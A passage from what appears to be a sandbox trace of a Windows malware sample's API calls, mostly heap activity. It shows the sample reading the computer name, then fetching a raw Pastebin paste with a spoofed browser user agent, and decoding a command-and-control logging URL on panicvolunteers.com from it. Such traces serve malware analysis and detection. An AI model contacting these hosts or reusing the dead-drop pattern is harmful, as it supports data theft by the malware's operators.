lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8cd5e0 | out: hHeap=0x850000) returned 1 [0277.656] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.656] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.656] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.657] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969b08 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.657] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969b08 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88b0d8 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a630 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a690 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891968 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e1b8 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969ac0 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969dc0 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891878 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e1e0 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d90 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969da8 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e258 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a6d8 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x95a520 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891998 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969e50 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969e38 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969e20 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919a8 | out: hHeap=0x850000) returned 1 [0277.657] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969e98 | out: hHeap=0x850000) returned 1 [0277.658] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969e80 | out: hHeap=0x850000) returned 1 [0277.938] GetComputerNameW (in: lpBuffer=0x75f250, nSize=0x75f56c | out: lpBuffer="XDUWTFONO", nSize=0x75f56c) returned 1 [0277.938] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a6a8 [0277.938] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e050 [0277.939] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8918f8 [0277.939] CoInitialize (pvReserved=0x0) returned 0x1 [0277.939] CoUninitialize () [0277.939] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x3c) returned 0x88b120 [0277.939] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0x88b138 | out: lpclsid=0x88b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0277.944] CoCreateInstance (in: rclsid=0x88b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x88b148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x75f518 | out: ppv=0x75f518*=0x896c30) returned 0x0 [0277.956] WinHttpRequest:IUnknown:QueryInterface (in: This=0x896c30, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x75f4e8 | out: ppvObject=0x75f4e8*=0x0) returned 0x80004002 [0277.956] WinHttpRequest:IUnknown:QueryInterface (in: This=0x896c30, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x75f4e8 | out: ppvObject=0x75f4e8*=0x0) returned 0x80004002 [0277.956] WinHttpRequest:IUnknown:QueryInterface (in: This=0x896c30, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x88b128 | out: ppvObject=0x88b128*=0x896c30) returned 0x0 [0277.956] WinHttpRequest:IUnknown:Release (This=0x896c30) returned 0x1 [0277.956] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0277.956] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f40 [0277.956] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f40 | out: hHeap=0x850000) returned 1 [0277.956] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969af0 | out: hHeap=0x850000) returned 1 [0277.956] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969b08 | out: hHeap=0x850000) returned 1 [0277.956] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e1e0 | out: hHeap=0x850000) returned 1 [0277.957] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8918f8 | out: hHeap=0x850000) returned 1 [0277.957] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e1e0 [0277.957] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969b08 [0277.957] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8918f8 [0277.957] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969af0 [0277.957] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f40 [0277.957] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0277.957] PeekMessageW (in: lpMsg=0x75f8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f8fc) returned 0 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891988 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891998 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f58 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919a8 [0277.958] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e488 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x969f70 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f88 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x969fa0 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x969fb8 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969fd0 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x969fe8 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a000 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a018 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a030 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a048 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919b8 [0277.958] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a060 [0277.958] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e4b0 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a078 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a090 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919b8 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a060 | out: hHeap=0x850000) returned 1 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919c8 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e4d8 [0277.959] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e4d8 | out: hHeap=0x850000) returned 1 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919c8 | out: hHeap=0x850000) returned 1 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a060 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x88b318 [0277.959] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e4d8 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0a8 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919c8 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919c8 | out: hHeap=0x850000) returned 1 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0d8 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0a8 | out: hHeap=0x850000) returned 1 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e4d8 | out: hHeap=0x850000) returned 1 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8633f0 | out: hHeap=0x850000) returned 1 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8750e0 | out: hHeap=0x850000) returned 1 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0d8 | out: hHeap=0x850000) returned 1 [0277.959] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8750e0 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0d8 [0277.959] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8750e0 | out: hHeap=0x850000) returned 1 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e4d8 [0277.959] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0a8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8750e0 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0f0 [0277.960] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0d8 | out: hHeap=0x850000) returned 1 [0277.960] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919c8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e500 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0d8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919d8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88e528 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a108 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919e8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a120 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919f8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x8bd3d8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a138 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a08 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x8d3938 [0277.960] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a138 | out: hHeap=0x850000) returned 1 [0277.960] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8bd3d8 | out: hHeap=0x850000) returned 1 [0277.960] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919f8 | out: hHeap=0x850000) returned 1 [0277.960] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919e8 | out: hHeap=0x850000) returned 1 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x8d39e8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919e8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a138 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919f8 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a150 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a18 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a168 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a28 [0277.960] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a180 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a38 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a198 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a48 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a1b0 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a58 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a1c8 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a68 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a1e0 [0277.961] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a78 [0277.961] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x75e978 | out: lpUrlComponents=0x75e978) returned 1 [0278.022] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a168 | out: hHeap=0x850000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88f1f8 [0278.022] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a1b0 | out: hHeap=0x850000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88f248 [0278.022] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a1c8 | out: hHeap=0x850000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x88f270 [0278.022] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x28) returned 0x88c480 [0278.022] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891c68 [0278.022] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a1e0 | out: hHeap=0x850000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x899090 [0278.022] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88c480 | out: hHeap=0x850000) returned 1 [0278.022] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891c68 | out: hHeap=0x850000) returned 1 [0278.022] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0278.023] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x75e9c0, dwBufferLength=0x8) returned 1 [0278.023] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x75e9cc | out: lpBuffer=0x0, lpdwBufferLength=0x75e9cc) returned 0 [0278.150] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a918 [0278.150] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x96a918, lpdwBufferLength=0x75e9cc | out: lpBuffer=0x96a918, lpdwBufferLength=0x75e9cc) returned 1 [0278.151] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a918 | out: hHeap=0x850000) returned 1 [0278.151] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0278.152] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0278.153] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0279.246] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x75e980, lpdwBufferLength=0x75e978, lpdwIndex=0x75e97c*=0x0 | out: lpBuffer=0x75e980*, lpdwBufferLength=0x75e978*=0x4, lpdwIndex=0x75e97c*=0x0) returned 1 [0279.246] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x75e99c, lpdwBufferLength=0x75e9c8, lpdwIndex=0x75e9cc*=0x0 | out: lpBuffer=0x75e99c, lpdwBufferLength=0x75e9c8, lpdwIndex=0x75e9cc*=0x0) returned 0 [0279.246] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x75e900 | out: lpCharType=0x75e900) returned 1 [0279.246] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x75e97c, dwFlags=0x0, dwContext=0x0) returned 1 [0279.246] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x2b) returned 0xac94a8 [0279.246] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xac94a8, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x75e980 | out: lpBuffer=0xac94a8*, lpdwNumberOfBytesRead=0x75e980*=0x2b) returned 1 [0279.246] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa746b0 [0279.246] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0xa16678 [0279.246] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x2b) returned 0xac94e0 [0279.246] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xac94e0, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x75e980 | out: lpBuffer=0xac94e0*, lpdwNumberOfBytesRead=0x75e980*=0x0) returned 1 [0279.246] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xac94e0 | out: hHeap=0x850000) returned 1 [0279.246] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0279.246] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x899090 | out: hHeap=0x850000) returned 1 [0279.246] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a78 | out: hHeap=0x850000) returned 1 [0279.246] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88f270 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88f248 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a58 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a198 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a48 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a180 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a38 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88f1f8 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a28 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a150 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a18 | out: hHeap=0x850000) returned 1 [0279.247] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a18 [0279.247] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x2b) returned 0x899090 [0279.247] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0279.247] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0279.247] CloseHandle (hObject=0x0) returned 0 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xac94a8 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa16678 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa746b0 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a138 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919f8 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8d39e8 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919e8 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8d3938 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a120 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a108 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88e528 | out: hHeap=0x850000) returned 1 [0279.247] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919d8 | out: hHeap=0x850000) returned 1 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x2c) returned 0xac94a8 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919d8 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x58) returned 0xa2bd10 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a08 [0279.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xac94a8, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x58) returned 0xa2bdd0 [0279.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xac94a8, cbMultiByte=44, lpWideCharStr=0xa2bdd0, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa2bdd0 | out: hHeap=0x850000) returned 1 [0279.248] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a108 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xac94a8 | out: hHeap=0x850000) returned 1 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919d8 | out: hHeap=0x850000) returned 1 [0279.248] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x899090 | out: hHeap=0x850000) returned 1 [0279.248] HeapFree (in: 